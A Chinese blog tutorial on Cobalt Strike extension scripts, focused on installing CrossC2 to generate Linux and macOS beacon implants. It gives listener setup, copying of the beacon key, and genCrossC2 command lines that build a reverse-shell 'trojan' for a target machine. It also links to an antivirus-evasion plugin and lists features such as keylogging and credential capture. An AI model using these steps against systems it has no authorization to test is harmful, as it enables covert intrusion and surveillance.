渗透测试框架进阶-拓展应用

CobaltStrike扩展脚本

扩展脚本简介

扩展是 Cobaltstrike 一个极为重要的模块,它有效地丰富了 Cobaltstrike 的功能。

选择菜单栏的 CobaltStrike > Script Manager(脚本管理器) ,点击 Load(加 载) ,然后选择要使用的 .cna 扩展文件即可。

扩展脚本插件

后渗透插件:梼杌 https://github.com/XZVB12/taowu-cobalt-strike-en 
免杀插件:bypassAV https://github.com/cseroad/bypassAV 
上线linux主机:CrossC2 https://github.com/gloxec/CrossC2

CS上线Linux主机

CrossC2介绍

Cross C2 项目是一个可以生成 Linux/Mac OS 的 Cobaltstrike beacon payload 的跨平台项目。

1.Linux & MacOS 支持无文件落地从内存中加载执行 动态库 或 可执行文件。
2.灵活自定义执行文件的数据返回类型,端口扫描,屏幕截图,键盘记录,口令凭证 等用户自定义开发实现更便捷。
3.自定义通信协议
4.支持横向移动
5.支持从内存加载脚本
6.Android & iPhone 支持

支持 CobaltStrike 对其他平台(Linux/MacOS/…)的安全评估,及包含Unix后渗透模 块开发支持

CrossC2安装

https://github.com/gloxec/CrossC2/releases/
先下载工具脚本

下载 CrossC2.cna、genCrossC2、CrossC2Kit

修改CrossC2.cna配置

修改 $CC2_PATH 路径为下载的 genCrossC2 真实路径 (因为在windows上搞,所以用的windows的exe)
修改 $CC2_BIN 为使用的 genCrossC2 程序名字

请添加图片描述

请添加图片描述

创建Listener与拷贝Key

第一步:创建Listener监听器 windows/beacon_https/reverse_https
第二步:拷贝teamserver目录的 .cobaltstrike.beacon_keys 文件到本地客户端目录

请添加图片描述

一定要先执行第一步,不然上线不了

先进行监听器的创建。

请添加图片描述

把那个key的文件下载到自己本机的windows上的cs4.7的目录下

请添加图片描述

添加CNA扩展脚本

去刚刚下载的cc2的那个文件夹里面找到cna的文件,添加 CrossC2.cna进去脚本管理器中 (如果成功安装,菜单栏会多出一项 CrossC2 )

请添加图片描述

功能扩展

打开下载的 CrossC2Kit 文件夹,添加 CrossC2Kit_Loader.cna , 包含内存加 载等其它功能

cs4.x 版本文件管理、进程列表功能缺失,必须使用此Loader来重启

请添加图片描述

CrossC2 上线测试

GUI生成木马

默认使用 cli 或 cna 提供的GUI功能生成 beacon

反向的:CrossC2 > Create CrossC2 Listener > Create reverse HTTPS Listener
正向的: CrossC2 > Create CrossC2 Listener > Create bind TCP Listener

请添加图片描述

在日志文件中可以看见具体的操作命令,第一部分是win.exe的程序路径,第二个是vps的ip和监听的端口,第三个是keys的路径 ,后面是linux的平台和架构,最后是木马的文件名字。

生成的木马文件在自己客户端的cs4.7的文件夹下面。

请添加图片描述

执行木马

生成的out文件丢去linux上去添加执行权限,然后开始执行,成功上线。默认是交互是ssh的一个交互,但是操作的命令和windows的不同,所以可以通过help来查看可以执行的命令。

请添加图片描述

请添加图片描述

Cli 生成木马

windows的命令行那种去生成木马

反向:
./genCrossC2.Win.exe Listener-IP Listener-Port .cobaltstrike.beacon_keys null Linux x64 cc2-test

正向:(要在linux中执行,好像只有4.1-4.4才能这样搞)
./genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux-bind x64 cc

请添加图片描述

可以在win.exe的目录找到木马,然后丢上去目标机器执行,会反弹回来shell。

请添加图片描述

操作过程中要注意如下几点:

  1. 需要改 cna 脚本中 genCrossC2 路径。
  2. 要使用 windows/beacon_https/reverse_https 监听器。
  3. 要把团队服务器下的隐藏文件 .cobaltstrike.beacon_keys 复制到本地 CS 目录下。
  4. 文件都丢到 CS 客户端根目录下,别搞二级目录。
  5. 生成的 payload 是一个 Linux 下的可执行 payload 和可执行文件, IP 和端 口对应 windows/beacon_https/reverse_https 监听器。
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值